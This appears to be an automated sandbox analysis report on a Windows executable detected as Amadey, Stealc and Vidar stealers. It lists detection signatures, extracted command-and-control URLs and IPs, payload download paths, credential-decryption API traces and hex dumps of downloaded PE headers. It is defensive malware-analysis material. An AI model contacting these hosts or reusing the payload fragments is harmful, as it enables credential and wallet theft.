Windows Analysis Report
8NjcvPNvUr.exe

Overview

General Information

Sample name: 8NjcvPNvUr.exe
renamed because original name is a hash value
Original sample name: e04afeeb6bb46b372bc1d7c2e2f25ead.exe
Analysis ID: 1483377
MD5: e04afeeb6bb46b372bc1d7c2e2f25ead
SHA1: 684d7f3cf0f8f94b1a58b39a97fd2f8f37f4a380
SHA256: 71db154390c24f07114784bf363d39dac8f1699c517064327724f83ca4acdfb9
Tags: 32exe

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has nameless sections
Potentially malicious time measurement code found
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious File Creation In Uncommon AppData Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
Amadey Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
Stealc Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
Vidar Vidar is a forked malware based on Arkei. It appears to be one of the first stealers that grabs information on 2FA software and Tor Browser. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: 8NjcvPNvUr.exe Avira: detected
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/Iw Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.phpaY Avira URL Cloud: Label: malware
Source: http://185.215.113.19/Vi9leo/index.php Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Vi9leo/index.phpM:S Avira URL Cloud: Label: phishing
Source: http://185.215.113.19/Local Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/cwx Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlly Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/softokn3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/nss3.dll Avira URL Cloud: Label: malware
Source: http://85.28.47.31/5499d72b3a3e55be.php-w6 Avira URL Cloud: Label: malware
Source: http://85.28.47.31/8405906461a5200c/freebl3.dll9 Avira URL Cloud: Label: malware
Source: http://185.215.113.16/soka/random.exeN Avira URL Cloud: Label: phishing
Source: http://85.28.47.31/Qwj Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Avira: detection malicious, Label: HEUR/AGEN.1314148
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: HEUR/AGEN.1314148
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Avira: detection malicious, Label: HEUR/AGEN.1312596
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\userKFHCAEGCBF.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 0000000A.00000002.2721852651.00000000025EA000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://85.28.47.31/5499d72b3a3e55be.php"}
Source: explorti.exe.7872.7.memstrmin Malware Configuration Extractor: Amadey {"C2 url": ["http://185.215.113.19/Vi9leo/index.php"]}
Source: http://85.28.47.31/8405906461a5200c/vcruntime140.dll Virustotal: Detection: 17%
Source: http://85.28.47.31/8405906461a5200c/freebl3.dlly Virustotal: Detection: 22%
Source: http://85.28.47.31/8405906461a5200c/softokn3.dllF Virustotal: Detection: 20%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe ReversingLabs: Detection: 39%
Source: 8NjcvPNvUr.exe Virustotal: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\userKFHCAEGCBF.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Joe Sandbox ML: detected
Source: 8NjcvPNvUr.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0040C660 memset,lstrlenA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,PK11_FreeSlot, 8_2_0040C660
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1D6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer, 8_2_6C1D6C80
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C32A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util, 8_2_6C32A9A0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C2F4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free, 8_2_6C2F4420
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C324440 PK11_PrivDecrypt, 8_2_6C324440
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3244C0 PK11_PubEncrypt, 8_2_6C3244C0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C3725B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt, 8_2_6C3725B0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C308670 PK11_ExportEncryptedPrivKeyInfo, 8_2_6C308670
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C32A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext, 8_2_6C32A650
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C30E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free, 8_2_6C30E6E0
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C34A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError, 8_2_6C34A730

Compliance

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Unpacked PE file: 10.2.8ec8c5c339.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Unpacked PE file: 30.2.8ec8c5c339.exe.400000.0.unpack
Source: 8NjcvPNvUr.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49564 version: TLS 1.2
Source: unknown HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.4:49565 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.4:49568 version: TLS 1.2
Source: Binary string: mozglue.pdbP source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: nss3.pdb@ source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: "description": "The name of the library's debug file. For example, 'xul.pdb" source: firefox.exe, 00000023.00000002.3334627067.0000028631D33000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: 8ec8c5c339.exe, 00000008.00000002.2780920957.000000006C3FF000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: mozglue.pdb source: 8ec8c5c339.exe, 00000008.00000002.2779820705.000000006C23D000.00000002.00000001.01000000.0000000C.sdmp
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
Source: firefox.exe Memory has grown: Private usage: 0MB later: 44MB

Networking

Source: Malware configuration extractor URLs: http://85.28.47.31/5499d72b3a3e55be.php
Source: Malware configuration extractor IPs: 185.215.113.19
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:04 GMTContent-Type: application/octet-streamContent-Length: 250368Last-Modified: Sat, 27 Jul 2024 03:21:04 GMTConnection: keep-aliveETag: "66a467a0-3d200"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 54 67 94 73 10 06 fa 20 10 06 fa 20 10 06 fa 20 7f 70 51 20 0b 06 fa 20 7f 70 64 20 00 06 fa 20 7f 70 50 20 74 06 fa 20 19 7e 69 20 1b 06 fa 20 10 06 fb 20 64 06 fa 20 7f 70 55 20 11 06 fa 20 7f 70 60 20 11 06 fa 20 7f 70 67 20 11 06 fa 20 52 69 63 68 10 06 fa 20 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 2c 7f 18 65 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0a 00 00 1a 02 00 00 78 03 02 00 00 00 00 e9 20 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 05 02 00 04 00 00 9a 07 04 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e4 58 02 00 78 00 00 00 00 c0 04 02 08 9a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 5c 59 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 53 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 bc 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 70 18 02 00 00 10 00 00 00 1a 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e8 32 00 00 00 30 02 00 00 34 00 00 00 1e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 2e 02 02 00 
70 02 00 00 dc 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 63 61 73 69 77 69 64 d3 02 00 00 00 a0 04 02 00 04 00 00 00 2e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 6d 75 66 75 00 00 00 00 04 00 00 00 b0 04 02 00 04 00 00 00 32 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 08 9a 00 00 00 c0 04 02 00 9c 00 00 00 36 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Sat, 27 Jul 2024 03:39:07 GMTContent-Type: application/octet-streamContent-Length: 3171840Last-Modified: Sat, 27 Jul 2024 03:08:39 GMTConnection: keep-aliveETag: "66a464b7-306600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 98 64 a4 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 c6 08 00 00 00 00 00 44 58 ad 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 70 ad 00 00 04 00 00 13 ca 12 00 02 00 40 80 00 00 80 00 00 20 00 00 00 00 80 00 00 20 00 00 00 00 00 00 10 00 00 00 50 40 8c 00 4e 0d 00 00 a0 4d 8c 00 4c 04 00 00 00 d0 12 00 e8 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 40 8c 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 8c 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 09 00 00 10 00 00 00 00 05 00 00 04 00 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 03 00 00 c0 09 00 00 f2 00 00 00 04 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 c0 0c 00 00 04 00 00 00 f6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 05 00 00 40 0d 00 00 f6 04 00 00 fa 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 80 00 00 00 50 12 00 00 62 00 00 00 f0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 90 00 00 00 d0 12 00 00 8e 00 00 00 52 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 b0 78 00 00 60 13 00 00 28 03 00 00 e0 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 60 21 00 00 10 8c 00 00 5e 21 00 00 08 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 27 Jul 2024 03:39:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 14:30:30 GMTETag: "10e436-5e7eeebed8d80"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 
00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
